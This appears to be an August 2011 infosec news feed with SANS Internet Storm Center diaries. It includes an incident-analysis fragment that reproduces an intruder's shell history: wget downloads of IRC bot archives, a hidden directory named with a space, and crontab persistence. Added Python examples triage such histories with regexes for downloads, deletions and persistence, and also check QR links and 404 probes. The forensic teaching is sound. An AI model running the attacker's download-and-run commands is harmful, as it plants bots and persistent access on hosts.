InfoSec News

Noted researcher Dan Kaminsky presented his latest network security research topics, including vulnerabilities in P2P networks, UPNP and home routers.

 
Microsoft sidesteps bug bounty with its own reward program, offering a cash prize for developing computer security protection technology.

 
Former CIA ops director Cofer Black urges the security community to educate decision makers and validate how cyberattacks endanger national defense.

 
McAfee says Operation Shady RAT, a five-year research effort involving 72 compromised organizations, exposes key national cybersecurity lapses.

 
Security product provider Rapid7 has updated its widely used open-source Metasploit exploitation framework, expanding the software so it supports enterprise IT security staff as well as its core audience of penetration testers.
 
Intel is opening up two research centers at Carnegie Mellon university that will develop technology around delivery of real-time information to consumer electronics aggregated from millions of cloud sources, the company said on Wednesday.
 
WiMax mobile operator Clearwire plans to add equipment to its network that can use LTE-Advanced, the next generation of LTE technology, the company announced Wednesday.
 
When hackers broke into Google's computer network nearly two years ago, their first step was to take over Microsoft Windows machines running in the company's China offices. Would Google have been better off had those workers been running the Mac?
 
The ACLU has asked law enforcement agencies in 31 states to detail how they are using mobile phone location data.
 
Google chief legal officer David Drummond Wednesday issued a stinging rebuke of what he called 'bogus patent' attacks on the Android operating system by major competitors like Apple, Oracle and Microsoft.
 
Microsoft today launched a $250,000 contest for researchers who develop defensive security technologies that deal with entire classes of exploits.
 
Cofer Black warns that government officials shouldn't dismiss warnings of imminent cyberattacks.
 
A $66.6 million Oracle ERP project undertaken by Pennsylvania's Liquor Control Board has been marred by inflated costs, staffing woes and operational problems, according to the state's auditor general.
 
Vonage Wednesday released an iPhone app that offers some benefits over Skype's competitive voice-over-IP calling service.
 
A report issued last week that claimed users of Microsoft's Internet Explorer have lower IQs than those who run rival browsers was a hoax.
 
Verizon Communications will appeal a $115 million verdict in a patent-infringement lawsuit brought by cloud-based TV infrastructure vendor ActiveVideo.
 
Samsung on Wednesday announced a software update for its Tab 10.1 tablet with a gaggle of business features, which could help the company push the device to corporate users.
 
Rodrigo Branco talks about vulnerabilities, malware sophistication and whether the move to cloud-based services will change the way cybercriminals work.

 
Android devices are now more than twice as likely to be hit with malware, thanks to new techniques exploiting numerous Android security issues.

 
LogRhythm Labs explains their new rules for the vendor’s SIM appliances.

 
WordPress Timthumb Plugin 'timthumb' Cache Directory Arbitrary File Upload Vulnerability
 
AT&T and Sprint Wednesday separately announced plans to sell new BlackBerry smartphones that are slated to hit the market by year's end.
 
Sermo, the largest online physician community in the U.S. with about 130,000 members, has launched an app that allows doctors to submit cases for near real-time peer review and feedback.
 
Two U.S. agencies announce charges against 72 alleged members of a child pornography bulletin board.
 
I just wrote a quick note about the Cisco warranty CD mixup. While writing that, it came to me that quite a few of our readers may currently be visiting Las Vegas for this summer's security drink fest. Historically, this has been a time to play various pranks on the audience of these conferences. In the past, fake ATMs, odd wifi networks, weird BGP issues and other tricks were mentioned.
One thing to look out for this year may be QR codes. 25% of internet users are now apparently using mobile devices. Many of them have known vulnerabilities the owner hasn't bothered to patch yet. At Vegas this week, you may prefer using your mobile device via 3G networks to avoid the notoriously unsafe wifi networks offered at these conferences.
But there is one problem with mobile devices: the keyboard typically stinks, in particular on cell phones. To help you with that, we have QR codes. QR codes are bar codes that encode text and are commonly understood by mobile devices. Take a picture of one, and an app will take you to the encoded URL. Sadly, most people are not all that good at decoding barcodes, and have no idea what they are entering. Compare it to handing your phone to a friend and telling them to type for you.
These barcodes can link directly to browser exploits, or could include other malicious content to manipulate your phone. If you spot a malicious code, let us know ... most of the applications will tell you what URL they are going to open before they actually load it (similar to some of the URL shorteners).


------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Cisco released a somewhat unusual advisory today [1]. Instead of talking about a vulnerability in a Cisco product, the advisory warns of a CD shipped by Cisco between December 2010 and August 2011 (that is, until now).
The CD itself does not include any malware, but documents on the CD, if opened in a browser, may include content from known malicious sites and could have led to exploitation of the user.
According to Cisco, the site in question has been down for some time, and they are not aware of Cisco customers being affected by content from the malicious site. But with all the talk about malicious USB sticks and people focusing countermeasures on preventing the use of unauthorized USB sticks, CDs/DVDs certainly should be considered too.
If you are in Vegas this week for Blackhat/Defcon: be on the lookout for certified pre-pw0n3d vendor software distributed on USB sticks or CDs. (Or QR codes? Maybe I should do a diary about that.)
[1] http://www.cisco.com/warp/public/707/cisco-sr-20110803-cd.shtml
------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
In what may be a preview of what will happen in the United States, the Australian telecommunications giant Telstra late last month released its plan to bring a close to the old telephone world. Telstra announced it will decommission its copper customer access network and stop offering fixed line telephone service to retail customers after July 1, 2018.
 
Hacker groups such as Anonymous and Lulz Security may need to be monitored more closely in the event they are assisted by other hackers with higher skill levels and decide to strike critical infrastructure.
 
Thanks to Pat for pointing out a sharp increase in the number of sources scanning for port 3389 [1].
Port 3389/TCP is used by Microsoft Terminal Services, and has been a continuing target of attacks. If you have any logs you want to share, please submit them via our contact page, in particular if you observed anything different over the last couple of days.

[1] https://isc.sans.edu/port.html?port=3389
------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Security vendor McAfee published a detailed report on Tuesday about a hacking group that penetrated 72 companies and organizations in 14 countries since 2006 in a massive operation that stole national secrets, business plans and other sensitive information.
 
Before the Internet, passwords played only a tiny role in everyday life. Think about it: Except for your ATM PIN, what important codes did you need to remember? Probably none. But now, you can’t click a link without hitting another site that requires a password. Doesn’t matter if it’s a big-name destination like Google Docs or Mint.com, or a smaller, more private site such as your local library or company intranet. You want in? Password, please.
 
There's a lot to love about Gmail, but its built-in task manager is pretty weak. In fact, it's little more than a glorified checklist.
 
Maxthon (free) is probably the best Web browser you've never heard of. I reviewed it favorably in the past, when it resembled a cousin of Internet Explorer 7. Since then, it's changed drastically. Maxthon includes two built-in rendering engines, Webkit and Trident, and you can switch between them with a click, which means no website should be incompatible when browsing. One of the best uses for this is to visit ancient sites (like for work) that only work with Internet Explorer.
 
phPhotoGallery Login field SQL Injection Vulnerability
 
Ataccan E-ticaret Scripti 'id' Parameter SQL Injection Vulnerability
 
BESNI OKUL PORTAL 'sayfa.asp' Cross Site Scripting Vulnerability
 
NC LinkList 'searchstring' Parameter Cross Site Scripting Vulnerability
 
mt LinkDatenbank 'b' Parameter Cross Site Scripting Vulnerability
 
An explosion in mobile malware during the last six months has more than doubled the chance that a user's Android smartphone will become infected, a security researcher said today.
 
A Japanese city is the first in the country to replace its public website with a Facebook page, as officials stressed the open nature of the social network as their main motivation.
 
Apple's latest ultraportable brings spectacular responsiveness and superior mobility to heavier workloads. Paul Venezia compares the new MacBook Air to the Pro.
 
Industry observers say that a stagnant laptop market could be reinvigorated by the energy-efficient ARM chips that power today's tablets. What do you think? Will ARM chips provide a shot in the arm to laptop sales, or has the post-PC era already arrived?
 
Security vendor McAfee published a detailed report on Tuesday about a hacking group that penetrated 72 companies and organizations in 14 countries since 2006 in a massive operation that stole national secrets, business plans and other sensitive information.
 
Facebook has acquired Push Pop Press, a start-up that has developed software for creating highly interactive digital books, for an undisclosed amount.
 
Game mechanics can help change the behavior of both employees and customers in beneficial ways. Just make sure to manage the risks effectively.
 

Posted by InfoSec News on Aug 03

http://news.cnet.com/8301-27080_3-20087201-245/researchers-warn-of-scada-equipment-discoverable-via-google/

By Elinor Mills
InSecurity Complex
August 2, 2011

LAS VEGAS -- Not only are SCADA systems used to run power plants and other
critical infrastructure lacking many security precautions to keep hackers out,
operators sometimes practically advertise their wares on Google search,
according to a demo today during a Black Hat conference...
 

Posted by InfoSec News on Aug 03

http://www.eweek.com/c/a/Security/Pwnie-Awards-in-2011-Include-Sony-Anonymous-LulzSec-WikiLeaks-113818/

By Fahmida Y. Rashid
eWEEK.com
2011-08-02

The nominations for the 2011 Pwnie Awards at Black Hat recognizes Sony
for its sheer incompetence at security, and Anonymous, LulzSec and
WikiLeaks for cyber-mayhem.

Security professionals heading to Black Hat can look forward to the
Pwnie Awards, the hacker version of the Academy Awards, this...
 

Posted by InfoSec News on Aug 03

http://www.washingtonpost.com/politics/nsa-is-looking-for-a-few-good-hackers/2011/08/02/gIQAXZAbqI_story.html

By Tabassum Zakaria
The Washington Post
August 2, 7:34 PM

The National Security Agency has a challenge for hackers who think
they’re hot stuff: Prove it by working on the "hardest problems on
Earth."

Computer hacker skills are in great demand in the U.S. government to
fight the cyberwars that pose a growing national...
 

Posted by InfoSec News on Aug 03

http://blogs.forbes.com/seanlawson/2011/08/01/dods-first-cyber-strategy-is-neither-first-nor-a-strategy/

By Sean Lawson
Net Assessment
Forbes.com
August 1, 2011

The Department of Defense has released its long-awaited "Department of
Defense Strategy for Operating in Cyberspace" [PDF], as well as a
website devoted to selling that strategy. The strategy has faced no
shortage of criticism over the last couple weeks, from VCJS Gen....
 

Posted by InfoSec News on Aug 03

http://www.smdailyjournal.com/article_preview.php?id=164202

By Michelle Durand
Daily Journal Staff
August 02, 2011

Documents containing personal information of approximately 1,500
Mills-Peninsula Health Services patients were removed from the facility
over the course of a year and taken home by a mailroom employee,
according to a hospital spokeswoman.

The worker, who has since been terminated, took the documents between
November 2009 and...
 
Joomla! 'com_astra' Component 'F' Parameter SQL Injection Vulnerability
 
./run
We are not quite sure whether any of the above exploits was successful. The id command, or the exploit itself, would have told the attacker whether he got lucky, but there aren't any traces in the shell history file that would tell us either way.
In any case, Phase #3a follows: the attacker installs some goodies. virus.tar isn't really a virus; it is a copy of EnergyMech, an IRC bot. Note how the bad guy uses Nano to edit the config file, which tells us that he isn't all that experienced on Unix. A real Unix hacker would most likely use vi, because vi is present on all Unix flavors and versions. Note also how he calls the IRC bot Evolution when he starts it, likely hoping that an admin would overlook it in a casual investigation.
/sbin/ifconfig -a | grep inet
wget http://f......com/storm12/virus.tar
tar xvf virus.tar
rm -rf virus.tar
cd virus
ls -a
nano start
nano inst
chmod +x *
./autorun
./start Evolution
Phase #3b: install some more goodies. egg.tgz is a copy of Eggdrop, another IRC bot. Note how the bad guy puts the files into a directory called " " (a single space). If you want to search for such directories on your system, try this:

# find / -name " "

mkdir
cd
ls -a
wget http://c.......org/egg.tgz
cd
tar zxvf egg.tgz
rm -rf egg.tgz
cd .access.log
ls -a
chmod +x *
./eggdrop -m bot1.conf
ls -a
cd scripts
nano respond.tcl
pwd


Phase #4: the attacker wants to make sure that access can be regained, and configures the crontab to restart some of his processes automatically on a schedule.
crontab -l
crontab -e
exit
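Turning the phases above into something you can run against a recovered history file, here is an added Python example (not the handler's tooling; the sample history is constructed to mirror the phases, with reserved .invalid hostnames standing in for the real download sites). It tags each line with the phase it belongs to and collects directory names chosen to be overlooked, such as a single space or .access.log, so you know what to feed to find.

```python
"""Triage a captured shell history for the post-compromise pattern described above.

Added example, not the handler's own tooling. SAMPLE_HISTORY is constructed to
mirror the phases in the diary (recon, download, unpack, IRC bots, hidden
directory, crontab); the hostnames use reserved .invalid names.
"""
import re
import shlex

SAMPLE_HISTORY = """\
/sbin/ifconfig -a | grep inet
wget http://dl.example.invalid/storm12/virus.tar
tar xvf virus.tar
rm -rf virus.tar
cd virus
chmod +x *
./start Evolution
mkdir " "
cd " "
wget http://dl.example.invalid/egg.tgz
tar zxvf egg.tgz
cd .access.log
./eggdrop -m bot1.conf
crontab -e
exit
"""

# Each rule: (tag, regex matched against the stripped command line).
RULES = [
    ("recon", re.compile(r"^(?:/sbin/)?ifconfig\b|^uname\b|^id\b|^w\b|^cat /etc/passwd")),
    ("download", re.compile(r"^(?:wget|curl|ftp|fetch)\b")),
    ("unpack-archive", re.compile(r"^tar\s+-?[a-z]*x")),
    ("evidence-removal", re.compile(r"^rm\s+-rf?\b")),
    ("make-executable", re.compile(r"^chmod\s+\+x\b")),
    ("irc-bot", re.compile(r"\b(?:eggdrop|energymech|psybnc)\b", re.I)),
    ("persistence", re.compile(r"^crontab\s+-e\b|/etc/cron|/etc/rc\.local|\.bashrc\b")),
]


def odd_dirname(name):
    """Names meant to be overlooked in a casual `ls`: whitespace-only, padded with
    spaces, or a dot-name dressed up as a log/config file (e.g. '.access.log')."""
    stripped = name.strip()
    if stripped == "" or stripped != name:
        return True
    return name.startswith(".") and name not in (".", "..") and name.endswith((".log", ".conf", ".txt"))


def triage(history_text):
    """Return tagged findings (line number, tag, command) and the odd directory names seen."""
    findings, hidden = [], set()
    for lineno, raw in enumerate(history_text.splitlines(), 1):
        cmd = raw.strip()
        if not cmd:
            continue
        for tag, pattern in RULES:
            if pattern.search(cmd):
                findings.append((lineno, tag, cmd))
        try:
            argv = shlex.split(cmd)
        except ValueError:          # unbalanced quotes in the history line
            argv = cmd.split()
        if len(argv) > 1 and argv[0] in ("mkdir", "cd") and odd_dirname(argv[-1]):
            hidden.add(argv[-1])
            findings.append((lineno, "hidden-directory", cmd))
    return {"findings": findings, "hidden_dirs": sorted(hidden)}


if __name__ == "__main__":
    result = triage(SAMPLE_HISTORY)
    for lineno, tag, cmd in result["findings"]:
        print(f"{lineno:3} {tag:18} {cmd}")
    print("directory names to search for with find -name:", result["hidden_dirs"])
```

The rules are deliberately coarse: a history file is a timeline, so the value is in seeing download, unpack, chmod and crontab appear in sequence, not in any single match. Whitespace-only names are caught by comparing the argument with its stripped form, which also flags a trailing-space trick such as "tmp ".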


(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
We received an email from a reader today about a link on his wife's Facebook wall. The link indicated that a friend had tagged her. When he tried to remove the post from her wall it would not allow removal. He reported it as spam. Apparently a friend of hers clicked on the link and got infected. The links point to bitlyDOTcom and have random file names. Let this serve as a reminder to everyone not to click on links until you have checked out the source. As for Bitly, I would use extreme caution with any links identified as coming from bitlyDOTcom. This is a website redirector that allows a link to be shortened, shared and tracked. Even if you don't get malicious programs installed, do you really want to be tracked?
Thanks to our reader Paul for the email reminder and information.
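Both the QR-code diary above and this one come down to the same check: look at where a link actually goes before letting the phone or browser open it. The following Python script is an added example, not code from ISC or either handler; it takes the text decoded from a QR code (or copied from a wall post) and reports the scheme, the real host and a list of warnings. The shortener list and the warning rules are assumptions chosen for illustration.

```python
"""Preview what a QR-code payload or shared link would do before opening it.

Added example (not ISC code). Assumptions: the SHORTENERS set and the warning
rules below are illustrative choices, not an authoritative list.
"""
import ipaddress
from urllib.parse import urlsplit

# Assumed, non-exhaustive list of public URL shorteners.
SHORTENERS = {"bit.ly", "bitly.com", "t.co", "goo.gl", "tinyurl.com", "ow.ly", "is.gd"}

# Schemes that a phone hands to another app (dialer, SMS, app store) rather than a browser.
ACTION_SCHEMES = {"tel", "sms", "smsto", "mailto", "market", "intent", "javascript", "file"}


def inspect_payload(text):
    """Return {'kind', 'scheme', 'host', 'warnings'}; an empty warnings list means nothing was flagged."""
    parts = urlsplit(text.strip())
    scheme = parts.scheme.lower()
    if not scheme:
        return {"kind": "text", "scheme": "", "host": "",
                "warnings": ["no URL scheme: a scanner app may show raw text or silently assume http://"]}
    if scheme in ACTION_SCHEMES:
        return {"kind": "action", "scheme": scheme, "host": "",
                "warnings": [f"'{scheme}:' payload triggers a device action (call, SMS, install), not a web page"]}

    warnings = []
    host = (parts.hostname or "").lower()
    if scheme not in ("http", "https"):
        warnings.append(f"unusual scheme '{scheme}:'")
    if parts.username is not None:
        # http://trusted.example@other.example/ : the part before '@' is only a username.
        warnings.append(f"user@ prefix: the real host is {host!r}, not {parts.username!r}")
    try:
        ipaddress.ip_address(host)
        warnings.append("host is a bare IP address rather than a domain name")
    except ValueError:
        pass
    if any(label.startswith("xn--") for label in host.split(".")):
        warnings.append("internationalised (punycode) host: possible look-alike domain")
    if host in SHORTENERS:
        warnings.append(f"{host} is a URL shortener: the destination is hidden and the click is tracked")
    return {"kind": "web", "scheme": scheme, "host": host, "warnings": warnings}


def describe(text):
    """One-line summary, the kind of preview a scanner app should show before opening anything."""
    info = inspect_payload(text)
    verdict = "OK" if not info["warnings"] else f"CHECK ({len(info['warnings'])} warning(s))"
    return f"{info['kind']:6} {info['scheme'] or '-':10} {info['host'] or '-':25} {verdict}"


if __name__ == "__main__":
    # Constructed sample payloads; the hosts are documentation/example names.
    for sample in ["https://isc.sans.edu/diary.html", "http://bit.ly/2xYz", "tel:+15555550100",
                   "http://paypal.example@203.0.113.7/login", "Booth 1234 - free t-shirts"]:
        print(describe(sample))
        for w in inspect_payload(sample)["warnings"]:
            print("   !", w)
```

The script never fetches anything, so a shortener still hides its destination; the point is that the user sees a shortener, an action scheme or a userinfo trick and decides before the phone does.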
Deb Hale (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
On Friday an article appeared on techdirt.com claiming that Pakistan is trying to ban encryption under their new Telco law. In the article the author suggests that encryption is really just a form of speech and that trying to ban encryption is like trying to ban language.

I find the banning of encryption interesting in light of the number of United States compliance standards and laws governing the use of encryption to protect financial data (PCI) and medical records (HIPAA) among them. These laws require that the data be protected in place and in transit. Does the proposed Telco Law in Pakistan mean that the US will not be able to exchange data with them? How will laws like this affect world trade?

All of the work that has been done to establish a world economy could come crashing down if laws like this stand. It will be interesting to see how this develops. Many businesses today operate on the Internet, and many are moving to the cloud. These businesses and organizations need to protect their data to protect their financial stability. So in this Handler's opinion, banning encryption will never happen. Others may not agree with me. Let me hear from you. Can we or should we ban encryption?

www.techdirt.com/articles/20110729/03142715310/reports-claim-that-pakistan-is-trying-to-ban-encryption-under-telco-law.shtml

Deb Hale (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
When Lion first appeared in the Apple App Store most of us probably blindly clicked YES YES YES like good little Apple zombies (me included!)... After some updates and fiddling with applications to get them working I started to take a hard look at what was now leaving my devices. A new series of packets on port TCP 5223 was leaving outbound from my network stack and thanks to Little Snitch [1] I was in control of it.

On Apple's support site [2] you will find a list of well-known TCP/UDP ports used by Apple operating systems, and according to their site:

5223 / TCP / XMPP over SSL, Apple Push Notification Service / used by MobileMe (automatic sync notifications) (see note 9), APNs, FaceTime, Game Center

Check out my first video diary, taking a look at these packets.


Richard Porter
--- ISC Handler on Duty

[1] http://www.obdev.at/products/littlesnitch/index.html
[2] http://support.apple.com/kb/ts1629 (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Chris Mohan

--- Internet Storm Center Handler on Duty (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
----------- Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu SEC 503 coming to Ottawa Sep 2011 (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
We all know that web applications are the new firewall. However, so far we have had a hard time collecting web application logs. The hard part is to balance ease of install of a sensor (without disrupting the web application), fidelity of the log information and privacy.
With firewall logs, it is pretty simple. A rejected packet in a firewall has very little information and privacy isn't a big issue. Web applications are different, as the actual meat of the log event is in the request content, which may contain personal information. Parsing web logs isn't so easy either: administrators frequently customize log formats for special purposes.
To balance these different issues we decided to focus on errors, but instead of parsing logs, we set up a little PHP script that you can add to your error page. In its current form, the script will work with PHP web servers (tested with Apache) that support the curl extension. Curl is installed by default in current versions of PHP.
Now all you need is an error page. In Apache, just use the ErrorDocument configuration directive. For example:

ErrorDocument 404 /error.html

will redirect users to /error.html in case of a 404 error [1]. You may already have a page like that configured. All you need to do is add the PHP snippet to the end, sending us the intended URL, the user agent and the IP address of the client accessing the missing page.
The hope is to collect data from automated probes, similar to how DShield's firewall logs reflect portscan activity.
In particular if you are running a personal / home web server: please consider adding the collector script.
Once we get a few submitters, we will start adding continuously updated reports to the site, just like we do for the DShield data. However, we can't do this until we have at least a dozen submitters (better 100 or more). We cannot publish one-off errors as they will likely be specific to your site and again could cause privacy issues.
Why do we only support PHP? Well, that's the language I know. Feel free to submit a .Net/Java/Ruby/Perl or whatever version of the script.
Simple steps to sign up:

Log in to retrieve your authentication key here: https://isc.sans.edu/myinfo.html
Download the PHP snippet here: https://isc.sans.edu/tools/404project.html
Paste it into your error document
Test...

Please contact us if you have any questions.
[1] http://httpd.apache.org/docs/2.0/mod/core.html#errordocument
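As an added example (not the 404 project's PHP snippet), the Python below does the same aggregation locally on an Apache combined-format access log: it keeps the three fields the project collects (requested path, user agent, client IP) from 404 responses, drops the query string where personal data tends to appear, and separates a source that walks many non-existent paths from an ordinary user following a stale link. The log lines are constructed and PROBE_THRESHOLD is an assumed cut-off.

```python
"""Summarise 404s from an Apache combined-format access log to surface automated probes.

Added example, not the ISC 404 project's PHP snippet. SAMPLE_LOG is constructed
(documentation-range addresses, example.org hostnames); PROBE_THRESHOLD is an
assumed cut-off, not a value from the project.
"""
import re
from collections import defaultdict

SAMPLE_LOG = """\
203.0.113.10 - - [03/Aug/2011:10:00:01 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.10 - - [03/Aug/2011:10:00:02 +0000] "GET /pma/ HTTP/1.1" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.10 - - [03/Aug/2011:10:00:02 +0000] "GET /admin/config.php HTTP/1.1" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.10 - - [03/Aug/2011:10:00:03 +0000] "GET /setup.php HTTP/1.1" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.7 - - [03/Aug/2011:10:05:00 +0000] "GET /account.php?user=alice@example.org HTTP/1.1" 404 210 "http://www.example.org/" "Mozilla/5.0 (Windows NT 6.1) Firefox/5.0"
198.51.100.7 - - [03/Aug/2011:10:05:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/5.0"
"""

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
PROBE_THRESHOLD = 3  # assumed: this many distinct missing paths from one IP looks automated


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def not_found_events(log_text):
    """404 events with the query string dropped, which is where personal data usually sits."""
    events = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["status"] == "404":
            events.append({"ip": rec["ip"], "path": rec["path"].split("?", 1)[0],
                           "ua": rec["ua"], "referer": rec["referer"]})
    return events


def probe_report(events, threshold=PROBE_THRESHOLD):
    """Group 404s by client IP; a client missing many distinct paths is reported as a probe."""
    paths, agents, referred = defaultdict(set), defaultdict(set), defaultdict(int)
    for ev in events:
        paths[ev["ip"]].add(ev["path"])
        agents[ev["ip"]].add(ev["ua"])
        if ev["referer"] != "-":
            referred[ev["ip"]] += 1
    report = {}
    for ip, missing in paths.items():
        if len(missing) >= threshold:
            report[ip] = {"paths": sorted(missing), "agents": sorted(agents[ip]),
                          "with_referer": referred[ip]}
    return report


if __name__ == "__main__":
    for ip, info in probe_report(not_found_events(SAMPLE_LOG)).items():
        print(ip, "missed", len(info["paths"]), "distinct paths; agents:", info["agents"])
        for p in info["paths"]:
            print("   ", p)
```

Running this over a week of your own logs before signing up tells you what you would be submitting; the query string is dropped for exactly the privacy reason the diary raises, and the referer count is kept because a human following a stale link usually arrives from somewhere, while a probe usually does not.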
------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Citrix has identified a vulnerability in XenApp and XenDesktop which could potentially be exploited by sending a well-crafted packet to the vulnerable XML component. The code will run with the privileges of the service.
Citrix has posted a list of versions vulnerable to this issue, with the hotfixes available, here [1].
[1] http://support.citrix.com/article/CTX129430


-----------
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
A little while ago I asked for some SSH logs and as per usual people responded with gusto. So first of all thanks to all of those that provided logs; it was very much appreciated. Looking through the data it does look like everything is pretty much the same as usual: get a userid, guess with password1, password2, password3, etc.

One variation did show. One of the log files showed that instead of the password changing, the userid was changed. So pick a password and try it with userid1, userid2, userid3, etc., then pick password2 and rinse, lather and repeat. Some of the other log files may have shown the same, but not all log files had userids and passwords available.

A number of the IP addresses showed that they were using the same password list, indicating that either they were being generated by the same tool or might be part of the same botnet. Quite a few IP addresses showed up in different logs submitted.

The most common userids were, not unexpectedly, root, admin, administrator, mysql, oracle, nagios. A few more specific userids do creep in, but most are the standard ones.

So not earth shattering or even mildly surprising, but sometimes it is good to know that things haven't changed, much.

As for the attacking IPs, you can find the unique IP addresses performing SSH attacks here: http://www.shearwater.com.au/uploads/files/MH/SSH_attacking_IPs.txt
A number of the logs were provided by the kippo SSH honeypot, which looks like it is well worth running if you want to collect your own info.
Thanks again and if I manage to dig out anything further I'll keep you up to date.
Mark (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
One of my favourite tools has to be Metasploit, and version 4 has been released and is available for download.
Updating an existing instance is a cinch: just run msfupdate or SVN and you should be good to go. Alternatively you can get fresh install files from the Metasploit web site. More info here -- https://community.rapid7.com/community/metasploit/blog/2011/08/01/metasploit-40-released?utm_source=feedburnerutm_medium=feedutm_campaign=Feed%3A+metasploit%2Fblog+%28Metasploit+Blog%29
Enjoy.

Mark (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Posted by InfoSec News on Aug 03

http://www.informationweek.com/news/security/attacks/231300047

By Mathew J. Schwartz
InformationWeek
August 02, 2011

Over the past year, the median cost of cybercrime increased by 56%, and
now costs companies an average of $6 million per year.

That finding comes from Ponemon Institute, which on Tuesday released its
Second Annual Cost of Cyber Crime Study, sponsored by HP ArcSight. For
the study, Ponemon questioned 50 U.S.-based businesses,...
 